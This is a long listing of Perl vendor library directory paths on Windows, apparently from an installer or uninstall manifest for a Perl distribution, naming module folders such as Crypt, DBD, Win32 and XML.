c:\Perl\perl\vendor\lib\auto\Class\ErrorHandler\*<br />
c:\Perl\perl\vendor\lib\auto\Class\ErrorHandler<br />
c:\Perl\perl\vendor\lib\auto\Class\Inspector\*<br />
c:\Perl\perl\vendor\lib\auto\Class\Inspector<br />
c:\Perl\perl\vendor\lib\auto\Class\Loader\*<br />
c:\Perl\perl\vendor\lib\auto\Class\Loader<br />
c:\Perl\perl\vendor\lib\auto\common\*<br />
c:\Perl\perl\vendor\lib\auto\common<br />
c:\Perl\perl\vendor\lib\auto\common\sense\*<br />
c:\Perl\perl\vendor\lib\auto\common\sense<br />
c:\Perl\perl\vendor\lib\auto\Compress\*<br />
c:\Perl\perl\vendor\lib\auto\Compress<br />
c:\Perl\perl\vendor\lib\auto\Compress\Bzip2\*<br />
c:\Perl\perl\vendor\lib\auto\Compress\Bzip2<br />
c:\Perl\perl\vendor\lib\auto\Compress\Raw\*<br />
c:\Perl\perl\vendor\lib\auto\Compress\Raw<br />
c:\Perl\perl\vendor\lib\auto\Compress\Raw\Lzma\*<br />
c:\Perl\perl\vendor\lib\auto\Compress\Raw\Lzma<br />
c:\Perl\perl\vendor\lib\auto\Compress\unLZMA\*<br />
c:\Perl\perl\vendor\lib\auto\Compress\unLZMA<br />
c:\Perl\perl\vendor\lib\auto\Convert\*<br />
c:\Perl\perl\vendor\lib\auto\Convert<br />
c:\Perl\perl\vendor\lib\auto\Convert\ASCII\*<br />
c:\Perl\perl\vendor\lib\auto\Convert\ASCII<br />
c:\Perl\perl\vendor\lib\auto\Convert\ASCII\Armour\*<br />
c:\Perl\perl\vendor\lib\auto\Convert\ASCII\Armour<br />
c:\Perl\perl\vendor\lib\auto\Convert\ASN1\*<br />
c:\Perl\perl\vendor\lib\auto\Convert\ASN1<br />
c:\Perl\perl\vendor\lib\auto\Convert\PEM\*<br />
c:\Perl\perl\vendor\lib\auto\Convert\PEM<br />
c:\Perl\perl\vendor\lib\auto\CPAN\*<br />
c:\Perl\perl\vendor\lib\auto\CPAN<br />
c:\Perl\perl\vendor\lib\auto\CPAN\Checksums\*<br />
c:\Perl\perl\vendor\lib\auto\CPAN\Checksums<br />
c:\Perl\perl\vendor\lib\auto\CPAN\DistnameInfo\*<br />
c:\Perl\perl\vendor\lib\auto\CPAN\DistnameInfo<br />
c:\Perl\perl\vendor\lib\auto\CPAN\Inject\*<br />
c:\Perl\perl\vendor\lib\auto\CPAN\Inject<br />
c:\Perl\perl\vendor\lib\auto\CPAN\Meta\*<br />
c:\Perl\perl\vendor\lib\auto\CPAN\Meta<br />
c:\Perl\perl\vendor\lib\auto\CPAN\Meta\YAML\*<br />
c:\Perl\perl\vendor\lib\auto\CPAN\Meta\YAML<br />
c:\Perl\perl\vendor\lib\auto\CPAN\SQLite\*<br />
c:\Perl\perl\vendor\lib\auto\CPAN\SQLite<br />
c:\Perl\perl\vendor\lib\auto\Crypt\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt<br />
c:\Perl\perl\vendor\lib\auto\Crypt\Blowfish\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\Blowfish<br />
c:\Perl\perl\vendor\lib\auto\Crypt\CAST5_PP\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\CAST5_PP<br />
c:\Perl\perl\vendor\lib\auto\Crypt\CBC\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\CBC<br />
c:\Perl\perl\vendor\lib\auto\Crypt\DES\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\DES<br />
c:\Perl\perl\vendor\lib\auto\Crypt\DES_EDE3\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\DES_EDE3<br />
c:\Perl\perl\vendor\lib\auto\Crypt\DH\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\DH<br />
c:\Perl\perl\vendor\lib\auto\Crypt\DSA\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\DSA<br />
c:\Perl\perl\vendor\lib\auto\Crypt\IDEA\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\IDEA<br />
c:\Perl\perl\vendor\lib\auto\Crypt\OpenPGP\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\OpenPGP<br />
c:\Perl\perl\vendor\lib\auto\Crypt\Primes\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\Primes<br />
c:\Perl\perl\vendor\lib\auto\Crypt\Random\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\Random<br />
c:\Perl\perl\vendor\lib\auto\Crypt\Rijndael\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\Rijndael<br />
c:\Perl\perl\vendor\lib\auto\Crypt\RIPEMD160\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\RIPEMD160<br />
c:\Perl\perl\vendor\lib\auto\Crypt\RSA\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\RSA<br />
c:\Perl\perl\vendor\lib\auto\Crypt\SSLeay\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\SSLeay<br />
c:\Perl\perl\vendor\lib\auto\Crypt\Twofish\*<br />
c:\Perl\perl\vendor\lib\auto\Crypt\Twofish<br />
c:\Perl\perl\vendor\lib\auto\Data\*<br />
c:\Perl\perl\vendor\lib\auto\Data<br />
c:\Perl\perl\vendor\lib\auto\Data\Buffer\*<br />
c:\Perl\perl\vendor\lib\auto\Data\Buffer<br />
c:\Perl\perl\vendor\lib\auto\Data\Compare\*<br />
c:\Perl\perl\vendor\lib\auto\Data\Compare<br />
c:\Perl\perl\vendor\lib\auto\Data\Random\*<br />
c:\Perl\perl\vendor\lib\auto\Data\Random<br />
c:\Perl\perl\vendor\lib\auto\DBD\*<br />
c:\Perl\perl\vendor\lib\auto\DBD<br />
c:\Perl\perl\vendor\lib\auto\DBD\ADO\*<br />
c:\Perl\perl\vendor\lib\auto\DBD\ADO<br />
c:\Perl\perl\vendor\lib\auto\DBD\mysql\*<br />
c:\Perl\perl\vendor\lib\auto\DBD\mysql<br />
c:\Perl\perl\vendor\lib\auto\DBD\ODBC\*<br />
c:\Perl\perl\vendor\lib\auto\DBD\ODBC<br />
c:\Perl\perl\vendor\lib\auto\DBD\Pg\*<br />
c:\Perl\perl\vendor\lib\auto\DBD\Pg<br />
c:\Perl\perl\vendor\lib\auto\DBD\SQLite\*<br />
c:\Perl\perl\vendor\lib\auto\DBD\SQLite<br />
c:\Perl\perl\vendor\lib\auto\DBI\*<br />
c:\Perl\perl\vendor\lib\auto\DBI<br />
c:\Perl\perl\vendor\lib\auto\DBIx\*<br />
c:\Perl\perl\vendor\lib\auto\DBIx<br />
c:\Perl\perl\vendor\lib\auto\DBIx\Simple\*<br />
c:\Perl\perl\vendor\lib\auto\DBIx\Simple<br />
c:\Perl\perl\vendor\lib\auto\DBM\*<br />
c:\Perl\perl\vendor\lib\auto\DBM<br />
c:\Perl\perl\vendor\lib\auto\DBM\Deep\*<br />
c:\Perl\perl\vendor\lib\auto\DBM\Deep<br />
c:\Perl\perl\vendor\lib\auto\DB_File\*<br />
c:\Perl\perl\vendor\lib\auto\DB_File<br />
c:\Perl\perl\vendor\lib\auto\Digest\*<br />
c:\Perl\perl\vendor\lib\auto\Digest<br />
c:\Perl\perl\vendor\lib\auto\Digest\BubbleBabble\*<br />
c:\Perl\perl\vendor\lib\auto\Digest\BubbleBabble<br />
c:\Perl\perl\vendor\lib\auto\Digest\HMAC\*<br />
c:\Perl\perl\vendor\lib\auto\Digest\HMAC<br />
c:\Perl\perl\vendor\lib\auto\Digest\MD2\*<br />
c:\Perl\perl\vendor\lib\auto\Digest\MD2<br />
c:\Perl\perl\vendor\lib\auto\Digest\SHA1\*<br />
c:\Perl\perl\vendor\lib\auto\Digest\SHA1<br />
c:\Perl\perl\vendor\lib\auto\FCGI\*<br />
c:\Perl\perl\vendor\lib\auto\FCGI<br />
c:\Perl\perl\vendor\lib\auto\File\*<br />
c:\Perl\perl\vendor\lib\auto\File<br />
c:\Perl\perl\vendor\lib\auto\File\chmod\*<br />
c:\Perl\perl\vendor\lib\auto\File\chmod<br />
c:\Perl\perl\vendor\lib\auto\File\Find\*<br />
c:\Perl\perl\vendor\lib\auto\File\Find<br />
c:\Perl\perl\vendor\lib\auto\File\Find\Rule\*<br />
c:\Perl\perl\vendor\lib\auto\File\Find\Rule<br />
c:\Perl\perl\vendor\lib\auto\File\HomeDir\*<br />
c:\Perl\perl\vendor\lib\auto\File\HomeDir<br />
c:\Perl\perl\vendor\lib\auto\File\pushd\*<br />
c:\Perl\perl\vendor\lib\auto\File\pushd<br />
c:\Perl\perl\vendor\lib\auto\File\Remove\*<br />
c:\Perl\perl\vendor\lib\auto\File\Remove<br />
c:\Perl\perl\vendor\lib\auto\File\ShareDir\*<br />
c:\Perl\perl\vendor\lib\auto\File\ShareDir<br />
c:\Perl\perl\vendor\lib\auto\File\Slurp\*<br />
c:\Perl\perl\vendor\lib\auto\File\Slurp<br />
c:\Perl\perl\vendor\lib\auto\File\Which\*<br />
c:\Perl\perl\vendor\lib\auto\File\Which<br />
c:\Perl\perl\vendor\lib\auto\GD\*<br />
c:\Perl\perl\vendor\lib\auto\GD<br />
c:\Perl\perl\vendor\lib\auto\HTML\*<br />
c:\Perl\perl\vendor\lib\auto\HTML<br />
c:\Perl\perl\vendor\lib\auto\HTML\Parser\*<br />
c:\Perl\perl\vendor\lib\auto\HTML\Parser<br />
c:\Perl\perl\vendor\lib\auto\HTML\Tagset\*<br />
c:\Perl\perl\vendor\lib\auto\HTML\Tagset<br />
c:\Perl\perl\vendor\lib\auto\Imager\*<br />
c:\Perl\perl\vendor\lib\auto\Imager<br />
c:\Perl\perl\vendor\lib\auto\Imager\CountColor\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\CountColor<br />
c:\Perl\perl\vendor\lib\auto\Imager\File\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\File<br />
c:\Perl\perl\vendor\lib\auto\Imager\File\GIF\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\File\GIF<br />
c:\Perl\perl\vendor\lib\auto\Imager\File\ICO\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\File\ICO<br />
c:\Perl\perl\vendor\lib\auto\Imager\File\JPEG\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\File\JPEG<br />
c:\Perl\perl\vendor\lib\auto\Imager\File\PNG\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\File\PNG<br />
c:\Perl\perl\vendor\lib\auto\Imager\File\SGI\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\File\SGI<br />
c:\Perl\perl\vendor\lib\auto\Imager\File\TIFF\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\File\TIFF<br />
c:\Perl\perl\vendor\lib\auto\Imager\Filter\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\Filter<br />
c:\Perl\perl\vendor\lib\auto\Imager\Filter\DynTest\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\Filter\DynTest<br />
c:\Perl\perl\vendor\lib\auto\Imager\Filter\Flines\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\Filter\Flines<br />
c:\Perl\perl\vendor\lib\auto\Imager\Filter\Mandelbrot\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\Filter\Mandelbrot<br />
c:\Perl\perl\vendor\lib\auto\Imager\Font\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\Font<br />
c:\Perl\perl\vendor\lib\auto\Imager\Font\FT2\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\Font\FT2<br />
c:\Perl\perl\vendor\lib\auto\Imager\Font\W32\*<br />
c:\Perl\perl\vendor\lib\auto\Imager\Font\W32<br />
c:\Perl\perl\vendor\lib\auto\IO\*<br />
c:\Perl\perl\vendor\lib\auto\IO<br />
c:\Perl\perl\vendor\lib\auto\IO\Compress\*<br />
c:\Perl\perl\vendor\lib\auto\IO\Compress<br />
c:\Perl\perl\vendor\lib\auto\IO\Compress\Lzma\*<br />
c:\Perl\perl\vendor\lib\auto\IO\Compress\Lzma<br />
c:\Perl\perl\vendor\lib\auto\IO\Interactive\*<br />
c:\Perl\perl\vendor\lib\auto\IO\Interactive<br />
c:\Perl\perl\vendor\lib\auto\IO\Socket\*<br />
c:\Perl\perl\vendor\lib\auto\IO\Socket<br />
c:\Perl\perl\vendor\lib\auto\IO\Socket\SSL\*<br />
c:\Perl\perl\vendor\lib\auto\IO\Socket\SSL<br />
c:\Perl\perl\vendor\lib\auto\IO\String\*<br />
c:\Perl\perl\vendor\lib\auto\IO\String<br />
c:\Perl\perl\vendor\lib\auto\IO\Stringy\*<br />
c:\Perl\perl\vendor\lib\auto\IO\Stringy<br />
c:\Perl\perl\vendor\lib\auto\IPC\*<br />
c:\Perl\perl\vendor\lib\auto\IPC<br />
c:\Perl\perl\vendor\lib\auto\IPC\Run3\*<br />
c:\Perl\perl\vendor\lib\auto\IPC\Run3<br />
c:\Perl\perl\vendor\lib\auto\IPC\System\*<br />
c:\Perl\perl\vendor\lib\auto\IPC\System<br />
c:\Perl\perl\vendor\lib\auto\IPC\System\Simple\*<br />
c:\Perl\perl\vendor\lib\auto\IPC\System\Simple<br />
c:\Perl\perl\vendor\lib\auto\JSON\*<br />
c:\Perl\perl\vendor\lib\auto\JSON<br />
c:\Perl\perl\vendor\lib\auto\JSON\PP\*<br />
c:\Perl\perl\vendor\lib\auto\JSON\PP<br />
c:\Perl\perl\vendor\lib\auto\JSON\XS\*<br />
c:\Perl\perl\vendor\lib\auto\JSON\XS<br />
c:\Perl\perl\vendor\lib\auto\local\*<br />
c:\Perl\perl\vendor\lib\auto\local<br />
c:\Perl\perl\vendor\lib\auto\local\lib\*<br />
c:\Perl\perl\vendor\lib\auto\local\lib<br />
c:\Perl\perl\vendor\lib\auto\LWP\*<br />
c:\Perl\perl\vendor\lib\auto\LWP<br />
c:\Perl\perl\vendor\lib\auto\LWP\Online\*<br />
c:\Perl\perl\vendor\lib\auto\LWP\Online<br />
c:\Perl\perl\vendor\lib\auto\Math\*<br />
c:\Perl\perl\vendor\lib\auto\Math<br />
c:\Perl\perl\vendor\lib\auto\Math\BigInt\*<br />
c:\Perl\perl\vendor\lib\auto\Math\BigInt<br />
c:\Perl\perl\vendor\lib\auto\Math\BigInt\GMP\*<br />
c:\Perl\perl\vendor\lib\auto\Math\BigInt\GMP<br />
c:\Perl\perl\vendor\lib\auto\Math\GMP\*<br />
c:\Perl\perl\vendor\lib\auto\Math\GMP<br />
c:\Perl\perl\vendor\lib\auto\Math\MPC\*<br />
c:\Perl\perl\vendor\lib\auto\Math\MPC<br />
c:\Perl\perl\vendor\lib\auto\Math\MPFR\*<br />
c:\Perl\perl\vendor\lib\auto\Math\MPFR<br />
c:\Perl\perl\vendor\lib\auto\Math\Pari\*<br />
c:\Perl\perl\vendor\lib\auto\Math\Pari<br />
c:\Perl\perl\vendor\lib\auto\Module\*<br />
c:\Perl\perl\vendor\lib\auto\Module<br />
c:\Perl\perl\vendor\lib\auto\Module\Metadata\*<br />
c:\Perl\perl\vendor\lib\auto\Module\Metadata<br />
c:\Perl\perl\vendor\lib\auto\Module\Signature\*<br />
c:\Perl\perl\vendor\lib\auto\Module\Signature<br />
c:\Perl\perl\vendor\lib\auto\Net\*<br />
c:\Perl\perl\vendor\lib\auto\Net<br />
c:\Perl\perl\vendor\lib\auto\Net\SMTP\*<br />
c:\Perl\perl\vendor\lib\auto\Net\SMTP<br />
c:\Perl\perl\vendor\lib\auto\Net\SMTP\TLS\*<br />
c:\Perl\perl\vendor\lib\auto\Net\SMTP\TLS<br />
c:\Perl\perl\vendor\lib\auto\Net\SSH2\*<br />
c:\Perl\perl\vendor\lib\auto\Net\SSH2<br />
c:\Perl\perl\vendor\lib\auto\Net\SSLeay\*<br />
c:\Perl\perl\vendor\lib\auto\Net\SSLeay<br />
c:\Perl\perl\vendor\lib\auto\Number\*<br />
c:\Perl\perl\vendor\lib\auto\Number<br />
c:\Perl\perl\vendor\lib\auto\Number\Compare\*<br />
c:\Perl\perl\vendor\lib\auto\Number\Compare<br />
c:\Perl\perl\vendor\lib\auto\PAR\*<br />
c:\Perl\perl\vendor\lib\auto\PAR<br />
c:\Perl\perl\vendor\lib\auto\PAR\Dist\*<br />
c:\Perl\perl\vendor\lib\auto\PAR\Dist<br />
c:\Perl\perl\vendor\lib\auto\PAR\Dist\FromPPD\*<br />
c:\Perl\perl\vendor\lib\auto\PAR\Dist\FromPPD<br />
c:\Perl\perl\vendor\lib\auto\PAR\Dist\InstallPPD\*<br />
c:\Perl\perl\vendor\lib\auto\PAR\Dist\InstallPPD<br />
c:\Perl\perl\vendor\lib\auto\PAR\Repository\*<br />
c:\Perl\perl\vendor\lib\auto\PAR\Repository<br />
c:\Perl\perl\vendor\lib\auto\PAR\Repository\Client\*<br />
c:\Perl\perl\vendor\lib\auto\PAR\Repository\Client<br />
c:\Perl\perl\vendor\lib\auto\PAR\Repository\Query\*<br />
c:\Perl\perl\vendor\lib\auto\PAR\Repository\Query<br />
c:\Perl\perl\vendor\lib\auto\Params\*<br />
c:\Perl\perl\vendor\lib\auto\Params<br />
c:\Perl\perl\vendor\lib\auto\Params\Util\*<br />
c:\Perl\perl\vendor\lib\auto\Params\Util<br />
c:\Perl\perl\vendor\lib\auto\Parse\*<br />
c:\Perl\perl\vendor\lib\auto\Parse<br />
c:\Perl\perl\vendor\lib\auto\Parse\Binary\*<br />
c:\Perl\perl\vendor\lib\auto\Parse\Binary<br />
c:\Perl\perl\vendor\lib\auto\Perl\*<br />
c:\Perl\perl\vendor\lib\auto\Perl<br />
c:\Perl\perl\vendor\lib\auto\Perl\OSType\*<br />
c:\Perl\perl\vendor\lib\auto\Perl\OSType<br />
c:\Perl\perl\vendor\lib\auto\pip\*<br />
c:\Perl\perl\vendor\lib\auto\pip<br />
c:\Perl\perl\vendor\lib\auto\pler\*<br />
c:\Perl\perl\vendor\lib\auto\pler<br />
c:\Perl\perl\vendor\lib\auto\PPM\*<br />
c:\Perl\perl\vendor\lib\auto\PPM<br />
c:\Perl\perl\vendor\lib\auto\Probe\*<br />
c:\Perl\perl\vendor\lib\auto\Probe<br />
c:\Perl\perl\vendor\lib\auto\Probe\Perl\*<br />
c:\Perl\perl\vendor\lib\auto\Probe\Perl<br />
c:\Perl\perl\vendor\lib\auto\share\*<br />
c:\Perl\perl\vendor\lib\auto\share<br />
c:\Perl\perl\vendor\lib\auto\share\dist\*<br />
c:\Perl\perl\vendor\lib\auto\share\dist<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\*<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6\*<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6\bin\*<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6\bin<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6\include\*<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6\include<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6\include\tidyp\*<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6\include\tidyp<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6\lib\*<br />
c:\Perl\perl\vendor\lib\auto\share\dist\Alien-Tidyp\v1.4.6\lib<br />
c:\Perl\perl\vendor\lib\auto\share\dist\DBD-SQLite\*<br />
c:\Perl\perl\vendor\lib\auto\share\dist\DBD-SQLite<br />
c:\Perl\perl\vendor\lib\auto\share\dist\File-ShareDir\*<br />
c:\Perl\perl\vendor\lib\auto\share\dist\File-ShareDir<br />
c:\Perl\perl\vendor\lib\auto\share\dist\File-ShareDir\subdir\*<br />
c:\Perl\perl\vendor\lib\auto\share\dist\File-ShareDir\subdir<br />
c:\Perl\perl\vendor\lib\auto\share\module\*<br />
c:\Perl\perl\vendor\lib\auto\share\module<br />
c:\Perl\perl\vendor\lib\auto\share\module\File-ShareDir\*<br />
c:\Perl\perl\vendor\lib\auto\share\module\File-ShareDir<br />
c:\Perl\perl\vendor\lib\auto\SOAP\*<br />
c:\Perl\perl\vendor\lib\auto\SOAP<br />
c:\Perl\perl\vendor\lib\auto\SOAP\Lite\*<br />
c:\Perl\perl\vendor\lib\auto\SOAP\Lite<br />
c:\Perl\perl\vendor\lib\auto\Sort\*<br />
c:\Perl\perl\vendor\lib\auto\Sort<br />
c:\Perl\perl\vendor\lib\auto\Sort\Versions\*<br />
c:\Perl\perl\vendor\lib\auto\Sort\Versions<br />
c:\Perl\perl\vendor\lib\auto\String\*<br />
c:\Perl\perl\vendor\lib\auto\String<br />
c:\Perl\perl\vendor\lib\auto\String\CRC32\*<br />
c:\Perl\perl\vendor\lib\auto\String\CRC32<br />
c:\Perl\perl\vendor\lib\auto\Sub\*<br />
c:\Perl\perl\vendor\lib\auto\Sub<br />
c:\Perl\perl\vendor\lib\auto\Sub\Uplevel\*<br />
c:\Perl\perl\vendor\lib\auto\Sub\Uplevel<br />
c:\Perl\perl\vendor\lib\auto\Task\*<br />
c:\Perl\perl\vendor\lib\auto\Task<br />
c:\Perl\perl\vendor\lib\auto\Task\Weaken\*<br />
c:\Perl\perl\vendor\lib\auto\Task\Weaken<br />
c:\Perl\perl\vendor\lib\auto\Term\*<br />
c:\Perl\perl\vendor\lib\auto\Term<br />
c:\Perl\perl\vendor\lib\auto\Term\ReadKey\*<br />
c:\Perl\perl\vendor\lib\auto\Term\ReadKey<br />
c:\Perl\perl\vendor\lib\auto\Test\*<br />
c:\Perl\perl\vendor\lib\auto\Test<br />
c:\Perl\perl\vendor\lib\auto\Test\Deep\*<br />
c:\Perl\perl\vendor\lib\auto\Test\Deep<br />
c:\Perl\perl\vendor\lib\auto\Test\Exception\*<br />
c:\Perl\perl\vendor\lib\auto\Test\Exception<br />
c:\Perl\perl\vendor\lib\auto\Test\Manifest\*<br />
c:\Perl\perl\vendor\lib\auto\Test\Manifest<br />
c:\Perl\perl\vendor\lib\auto\Test\NoWarnings\*<br />
c:\Perl\perl\vendor\lib\auto\Test\NoWarnings<br />
c:\Perl\perl\vendor\lib\auto\Test\Script\*<br />
c:\Perl\perl\vendor\lib\auto\Test\Script<br />
c:\Perl\perl\vendor\lib\auto\Test\Tester\*<br />
c:\Perl\perl\vendor\lib\auto\Test\Tester<br />
c:\Perl\perl\vendor\lib\auto\Test\Warn\*<br />
c:\Perl\perl\vendor\lib\auto\Test\Warn<br />
c:\Perl\perl\vendor\lib\auto\Text\*<br />
c:\Perl\perl\vendor\lib\auto\Text<br />
c:\Perl\perl\vendor\lib\auto\Text\Diff\*<br />
c:\Perl\perl\vendor\lib\auto\Text\Diff<br />
c:\Perl\perl\vendor\lib\auto\Text\Glob\*<br />
c:\Perl\perl\vendor\lib\auto\Text\Glob<br />
c:\Perl\perl\vendor\lib\auto\Tie\*<br />
c:\Perl\perl\vendor\lib\auto\Tie<br />
c:\Perl\perl\vendor\lib\auto\Tie\EncryptedHash\*<br />
c:\Perl\perl\vendor\lib\auto\Tie\EncryptedHash<br />
c:\Perl\perl\vendor\lib\auto\Tree\*<br />
c:\Perl\perl\vendor\lib\auto\Tree<br />
c:\Perl\perl\vendor\lib\auto\Tree\DAG_Node\*<br />
c:\Perl\perl\vendor\lib\auto\Tree\DAG_Node<br />
c:\Perl\perl\vendor\lib\auto\URI\*<br />
c:\Perl\perl\vendor\lib\auto\URI<br />
c:\Perl\perl\vendor\lib\auto\Version\*<br />
c:\Perl\perl\vendor\lib\auto\Version<br />
c:\Perl\perl\vendor\lib\auto\Version\Requirements\*<br />
c:\Perl\perl\vendor\lib\auto\Version\Requirements<br />
c:\Perl\perl\vendor\lib\auto\Win32\*<br />
c:\Perl\perl\vendor\lib\auto\Win32<br />
c:\Perl\perl\vendor\lib\auto\Win32\API\*<br />
c:\Perl\perl\vendor\lib\auto\Win32\API<br />
c:\Perl\perl\vendor\lib\auto\Win32\API\Callback\*<br />
c:\Perl\perl\vendor\lib\auto\Win32\API\Callback<br />
c:\Perl\perl\vendor\lib\auto\Win32\EventLog\*<br />
c:\Perl\perl\vendor\lib\auto\Win32\EventLog<br />
c:\Perl\perl\vendor\lib\auto\Win32\Exe\*<br />
c:\Perl\perl\vendor\lib\auto\Win32\Exe<br />
c:\Perl\perl\vendor\lib\auto\Win32\Exe\InsertResourceSection\*<br />
c:\Perl\perl\vendor\lib\auto\Win32\Exe\InsertResourceSection<br />
c:\Perl\perl\vendor\lib\auto\Win32\File\*<br />
c:\Perl\perl\vendor\lib\auto\Win32\File<br />
c:\Perl\perl\vendor\lib\auto\Win32\File\Object\*<br />
c:\Perl\perl\vendor\lib\auto\Win32\File\Object<br />
c:\Perl\perl\vendor\lib\auto\Win32\OLE\*<br />
c:\Perl\perl\vendor\lib\auto\Win32\OLE<br />
c:\Perl\perl\vendor\lib\auto\Win32\Process\*<br />
c:\Perl\perl\vendor\lib\auto\Win32\Process<br />
c:\Perl\perl\vendor\lib\auto\Win32\TieRegistry\*<br />
c:\Perl\perl\vendor\lib\auto\Win32\TieRegistry<br />
c:\Perl\perl\vendor\lib\auto\Win32\UTCFileTime\*<br />
c:\Perl\perl\vendor\lib\auto\Win32\UTCFileTime<br />
c:\Perl\perl\vendor\lib\auto\Win32\WinError\*<br />
c:\Perl\perl\vendor\lib\auto\Win32\WinError<br />
c:\Perl\perl\vendor\lib\auto\Win32API\*<br />
c:\Perl\perl\vendor\lib\auto\Win32API<br />
c:\Perl\perl\vendor\lib\auto\Win32API\Registry\*<br />
c:\Perl\perl\vendor\lib\auto\Win32API\Registry<br />
c:\Perl\perl\vendor\lib\auto\XML\*<br />
c:\Perl\perl\vendor\lib\auto\XML<br />
c:\Perl\perl\vendor\lib\auto\XML\LibXML\*<br />
c:\Perl\perl\vendor\lib\auto\XML\LibXML<br />
c:\Perl\perl\vendor\lib\auto\XML\LibXSLT\*<br />
c:\Perl\perl\vendor\lib\auto\XML\LibXSLT<br />
c:\Perl\perl\vendor\lib\auto\XML\NamespaceSupport\*<br />
c:\Perl\perl\vendor\lib\auto\XML\NamespaceSupport<br />
c:\Perl\perl\vendor\lib\auto\XML\Parser\*<br />
c:\Perl\perl\vendor\lib\auto\XML\Parser<br />
c:\Perl\perl\vendor\lib\auto\XML\Parser\Expat\*<br />
c:\Perl\perl\vendor\lib\auto\XML\Parser\Expat<br />
c:\Perl\perl\vendor\lib\auto\XML\SAX\*<br />
c:\Perl\perl\vendor\lib\auto\XML\SAX<br />
c:\Perl\perl\vendor\lib\auto\XML\Simple\*<br />
c:\Perl\perl\vendor\lib\auto\XML\Simple<br />
c:\Perl\perl\vendor\lib\auto\YAML\*<br />
c:\Perl\perl\vendor\lib\auto\YAML<br />
c:\Perl\perl\vendor\lib\auto\YAML\Tiny\*<br />
c:\Perl\perl\vendor\lib\auto\YAML\Tiny<br />
c:\Perl\perl\vendor\lib\BerkeleyDB\*<br />
c:\Perl\perl\vendor\lib\BerkeleyDB<br />
c:\Perl\perl\vendor\lib\Bundle\*<br />
c:\Perl\perl\vendor\lib\Bundle<br />
c:\Perl\perl\vendor\lib\Bundle\DBD\*<br />
c:\Perl\perl\vendor\lib\Bundle\DBD<br />
c:\Perl\perl\vendor\lib\Class\*<br />
c:\Perl\perl\vendor\lib\Class<br />
c:\Perl\perl\vendor\lib\Class\Inspector\*<br />
c:\Perl\perl\vendor\lib\Class\Inspector<br />
c:\Perl\perl\vendor\lib\common\*<br />
c:\Perl\perl\vendor\lib\common<br />
c:\Perl\perl\vendor\lib\Compress\*<br />
c:\Perl\perl\vendor\lib\Compress<br />
c:\Perl\perl\vendor\lib\Compress\Raw\*<br />
c:\Perl\perl\vendor\lib\Compress\Raw<br />
c:\Perl\perl\vendor\lib\Convert\*<br />
c:\Perl\perl\vendor\lib\Convert<br />
c:\Perl\perl\vendor\lib\Convert\ASCII\*<br />
c:\Perl\perl\vendor\lib\Convert\ASCII<br />
c:\Perl\perl\vendor\lib\Convert\ASN1\*<br />
c:\Perl\perl\vendor\lib\Convert\ASN1<br />
c:\Perl\perl\vendor\lib\Convert\PEM\*<br />
c:\Perl\perl\vendor\lib\Convert\PEM<br />
c:\Perl\perl\vendor\lib\CPAN\*<br />
c:\Perl\perl\vendor\lib\CPAN<br />
c:\Perl\perl\vendor\lib\CPAN\Meta\*<br />
c:\Perl\perl\vendor\lib\CPAN\Meta<br />
c:\Perl\perl\vendor\lib\CPAN\SQLite\*<br />
c:\Perl\perl\vendor\lib\CPAN\SQLite<br />
c:\Perl\perl\vendor\lib\CPAN\SQLite\DBI\*<br />
c:\Perl\perl\vendor\lib\CPAN\SQLite\DBI<br />
c:\Perl\perl\vendor\lib\Crypt\*<br />
c:\Perl\perl\vendor\lib\Crypt<br />
c:\Perl\perl\vendor\lib\Crypt\CAST5_PP\*<br />
c:\Perl\perl\vendor\lib\Crypt\CAST5_PP<br />
c:\Perl\perl\vendor\lib\Crypt\DSA\*<br />
c:\Perl\perl\vendor\lib\Crypt\DSA<br />
c:\Perl\perl\vendor\lib\Crypt\DSA\Key\*<br />
c:\Perl\perl\vendor\lib\Crypt\DSA\Key<br />
c:\Perl\perl\vendor\lib\Crypt\OpenPGP\*<br />
c:\Perl\perl\vendor\lib\Crypt\OpenPGP<br />
c:\Perl\perl\vendor\lib\Crypt\OpenPGP\Key\*<br />
c:\Perl\perl\vendor\lib\Crypt\OpenPGP\Key<br />
